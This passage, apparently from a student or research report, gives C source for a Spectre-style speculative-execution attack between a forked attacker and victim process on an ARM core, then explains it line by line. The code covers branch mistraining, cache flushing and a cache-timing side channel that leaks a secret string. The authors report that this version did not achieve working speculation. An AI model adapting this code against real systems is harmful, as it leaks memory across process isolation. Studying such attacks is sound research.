#define OOB_READ 16			// Number of byte read
//#define CACHE_CLEAN 512*64	// Number of cache lines cleans
#define ARRAY_SIZE 46		// Array1 size
#define FAKE_SIZE 13
#define MISTRAIN 10			// Parameter for mistraining
#define SAME_BIT_CYCLES 10	// Number of reading tries on the same byte
#define CACHE_LINES 128
#define N_OF_BITS 8 //number of bits in a byte
#define LATENCY_THRESHOLD	100
#define ARRAY2_SIZE 256*64
#define SPACE_FOR_PARAMS 50
#define SB 0
#define LINE_DISTANCE 64*64
extern void victimCode(int* array1_size,char* array1,char* array2,long int junk,int x);
extern long int Flush(long int line);
void callFakeBranches();

// pointer used to keep the starting address of the memory mapped region 
char *ptr;

//pipes pointers
int A2Vpipe_ptr[2];
int V2Apipe_ptr[2];

// Victim variables
char array1[ARRAY_SIZE];
char s[]="SecretStringOutside";
int array1_size = FAKE_SIZE;

// Attacker variables
int x;

char junk; // Used when reading cache latency, and also when passing the bit number to the victim

// Variable for byte read from cache side channel
//char clean[CACHE_CLEAN]; // to clean the L1 cache
uint32_t start,end;
//int temp=0; // Not to optimize the access to array2 during cache timing read
uint32_t timings[OOB_READ][N_OF_BITS][2]; // first index to scan reads of different bytes, second one to scan the single byte and find a bit, the third one for the value of the timing for the single bit
char byte_read,bit_read;
// Just indexes
int i,j,k,h,l,m;

// Cache timings file
FILE* fout;

int main(void){
	cpu_set_t  mask;
	CPU_ZERO(&mask);
	CPU_SET(0, &mask); // father and child will run in the same cpu, we chose CPU0

	if(sched_setaffinity(0, sizeof(mask), &mask)==-1) //0 as the first parameter works as getpid
		exit(1);
	// Timing File
	if((fout=fopen("cacheTimingsNewFormat.txt","w"))==NULL){
		printf("File open error\n");
		exit(1);
	}

	// Timing matrix initialization
	for(i=0;i<OOB_READ;i++){
		for(j=0;j<N_OF_BITS;j++){
			timings[i][j][0]=0;
            timings[i][j][1]=0;
        }
    }
	//mmap and pipes setup
	ptr = mmap(NULL, (ARRAY2_SIZE+SPACE_FOR_PARAMS), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
	if(ptr==MAP_FAILED){
		printf("mmap failed\n");
		return 1;
	}
 
	/* MAPPED MEMORY LAYOUT (scanned by a char pointer):
			ADDRESSES FROM 0 TO ARRAY2_SIZE-1: array2
			ADDRESSES FROM ARRAY2_SIZE TO ARRAY2_SIZE+3: int x
			ADDRESSES FROM ARRAY2_SIZE+4 TO ARRAY2_SIZE+11: long int junk
	*/
	if(pipe(A2Vpipe_ptr)==-1){
		printf("pipe allocation A2V failed\n");
		return 1;
	}
	if(pipe(V2Apipe_ptr)==-1){
		printf("pipe allocation V2A failed\n");
		return 1;
	}

	int pid=fork();
	if(pid==0){
    //victim
		char placeholder='A';
		char buf;
		// set up array1 with the public and secret contents (not visible to the father thanks to the copy on write policy)
		for(i=0;i<ARRAY_SIZE;i++)
			array1[i]=i+48;
		// wait for father request
		while(read(A2Vpipe_ptr[0],&buf,1)>0){ //NULL or a char variable?
			//not necessary to flash shared mem, already done in the attacker
			victimCode(&array1_size,array1,ptr,ptr[ARRAY2_SIZE+4],ptr[ARRAY2_SIZE]); //array1_size by reference (to avoid caching it before time), ptr (array2), ptr[ARRAY2_SIZE+4] (k), ptr[ARRAY2_SIZE] (x)
			// probably we are passing as part of x also the lsbs of junk, but in the victim code we filter them out (check the objdump)
			write(V2Apipe_ptr[1],&placeholder,1);
		}
		return 0;
	}else{
		//attacker
		char placeholder='A';
		char buf;
		char *addr;
		for(i=0,x=SB;i<OOB_READ;i++,x++){ //to scan over different reads
			byte_read=0;
			//printf("\n----------------- #%d --------------\n",i);
			for(m=0;m<N_OF_BITS;m++){ // to read a single byte one bit at a time
			// SAME_BYTE_CYCLES tries for each byte

				//srand(time(NULL));

				for(j=0;j<SAME_BIT_CYCLES;j++){ // to reread the bit multiple times, just to be safe

            k=0;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1); //NULL or character placeholder?
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1);
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1);
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1);
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1); //NULL or character placeholder?
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1); //NULL or character placeholder?
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1); //NULL or character placeholder?
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1); //NULL or character placeholder?
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1); //NULL or character placeholder?
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1); //NULL or character placeholder?
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1); //NULL or character placeholder?
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1); //NULL or character placeholder?
            k++;
            memcpy(&ptr[ARRAY2_SIZE],&k,sizeof(int)); // to copy the value of k in the shared memory
            memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory
            write(A2Vpipe_ptr[1],&placeholder,1);
            read(V2Apipe_ptr[0],&buf,1); //NULL or character placeholder?


					memcpy(&ptr[ARRAY2_SIZE],&x,sizeof(int)); // to copy the value of k in the shared memory
					memcpy(&ptr[ARRAY2_SIZE+4],&m,sizeof(long int)); //to copy the value of m in the shared memory

					// Flush the shared memory
					for(k=0;k<ARRAY2_SIZE+SPACE_FOR_PARAMS;k++) // Flushing array2
						Flush(&ptr[k]);

					//Flush everything else
					for(k=0;k<ARRAY_SIZE;k++)
						Flush(&array1[k]); // we still flush it for safety, probably there is no need because it contains dummy data for the father that are never accessed

					for(k=0;k<OOB_READ;k++)
						for(l=0;l<N_OF_BITS;l++){
							Flush(&timings[k][l][0]);
							Flush(&timings[k][l][1]);
						}

					// array1_size must be known by the father because it needs to issue requests for the mistraining
					Flush(&array1_size);
					//callFakeBranches();  // Mistraining branch predictor (setting BHR to 0000000000)
					
//					asm volatile(	"nop				\t\n");
					asm volatile(	"nop				\t\n");
					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8			 	\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );

					asm volatile(	"cmn sp,#0			\t\n"
									"beq 8		 		\t\n"
									"nop				\t\n"
															 );


					
					
				// Call using malicious x
					write(A2Vpipe_ptr[1],&placeholder,1);
					read(V2Apipe_ptr[0],&buf,1); //NULL or character placeholder?

				// Side channel exploitation
					for(k=0;k<2;k++){
						// Non-cached read
						addr = &ptr[k*LINE_DISTANCE];
						start=rdtsc32();
						junk &= *addr;
						end=rdtsc32();
						timings[i][m][k]+=end-start;
					}
				}
			// Avg timing for each cache line read (trying to detect a threshold between cached and not cached)
				fprintf(fout,"BIT %d: ",m);
				for(k=0;k<2;k++){
					timings[i][m][k]/=SAME_BIT_CYCLES;
					if(timings[i][m][0]>LATENCY_THRESHOLD){		// If bit=0 the value is already set since byte_read is initialized to 0
						bit_read = 0x1 << m;
						byte_read |= bit_read;
					}
					fprintf(fout,"%u ",timings[i][m][k]);
				}
				fprintf(fout,"\n");
			}
			printf("%c",byte_read);
		}
	}
	printf("\n");
	fclose(fout);
	close(A2Vpipe_ptr[1]);
	munmap(ptr,ARRAY2_SIZE+SPACE_FOR_PARAMS);
	return 0;
}

#pragma GCC pop_options

\end{lstlisting}
Let's explain the code step by step:
\begin{itemize}
    \item \textbf{Lines 37-38}: to declare the pipes that will be used to implement synchronization. The first 2 descriptors are the read and write descriptors for the pipe used by the attacker to unlock the victim, while the last ones are related to the pipe written by the victim to release control to the attacker.
    \item \textbf{Lines from 63 to 65}: to create the mask that corresponds to CPU0, which will be used to create the binding to the first CPU for the attacker and the victim. This is necessary because we saw that the attack on a multiprocess is very difficult due to the particular organization for the L2 cache that is present in the A53. This means that we have to make sure both processes execute on the same CPU, thing that is guaranteed by the following line.
    \item \textbf{Lines 67}: to perform the actual binding of the processes to CPU0. This is done by the call to \lstinline{sched_setaffinity()}, which relies on a system call to update the behavior of the scheduler for what concerns scheduling of the current process. The settings applied is inherited by the children, so after the fork both father and son will be mapped to CPU0.
    \item \textbf{Line 83}: the mmap used to initialize the memory area that will be accessible from both processes and which will host \lstinline{array2}. The mmap itself allows us to add to the page table for the current process (and the children) a new memory area that starts at the virtual address returned by the call. This is the only way in which we managed to share a memory area between processes. We also tried to make \lstinline{array2} a global array and share it exploiting the copy-on-write policy, but it didn't work (probably the array2 of the father and the child are still recognized as different). The layout of the memory area is explained in the comments, but to sum it up we have: the first part reserved for \lstinline{array2}, the second one for the x parameter and the last one for junk (second parameter).
    \item \textbf{Line 103}: the fork point. From now on we identify the victim as the child and the attacker as the father. The decision to use this kind of structure is due to the fact that the implementation of shared memory with different processes is more difficult and it adds nothing to the philosophy of the attack.
    \item \textbf{Lines 109-110}: to change the values of \lstinline{array1}, so that the new ones are invisible to the attacker. This is done to implement a mechanism that faithfully imitates the separation of data between different processes, which was not actually present in the previous attack (even if we pretended that the attacker was not able to read \lstinline{array1]}).
    \item \textbf{Lines from 112 to 117}: the while loop used to implement the synchronization. In the while condition we check if the attacker wrote something on the pipe: if this is the case than we enter the loop, otherwise we remain stuck in the blocking call (because the call to read with an empty pipe is blocking). When the father deallocates the pipe the read returns -1, so the while is interrupted an the victim executes the \lstinline{victimCode} function. The parameters to this function are the ones passed by the attacker by using the shared memory. After the call there is a write to notify the attacker that the execution terminated, then the victim is blocked again in the read.
    \item \textbf{Lines from 135 to 198}: the mistraining calls. As we said before, the calls are implemented by using the synchronization mechanism offered by the pipes. The first thing to do is to copy the parameters in the shared memory area by using \lstinline{memcpy}, then we unlock the victim with the write and we block in the read.
    \item \textbf{Lines from 201 to 202}: the copy of parameters before the malicious call. We can't do it directly before the call because we would cache the contents of the shared memory area, thus invalidating the cache attack. To avoid this problem we have to put these \lstinline{memcpy} calls before the flush of the shared area from the cache.
    \item \textbf{Lines from 205 to 217}: to flush from the cache everything that could influence the timing readings.
    \item \textbf{Lines from 223 to 287}: to realign the contents of the BHR associated to the branch in the victimCode so that they correspond to a string of zeroes, exactly as we did in the single process version. This method should work even now, because the branch prediction is done by manipulating virtual addresses (this is the whole premise of the version of the attack based on gadgets). There is the possibility that this premise is not valid, which would explain the fact that we didn't manage to achieve a working speculation mechanism in this multiprocess version.
    \item \textbf{Lines from 293 to 294}: the malicious call (implemented as the other calls).
\end{itemize}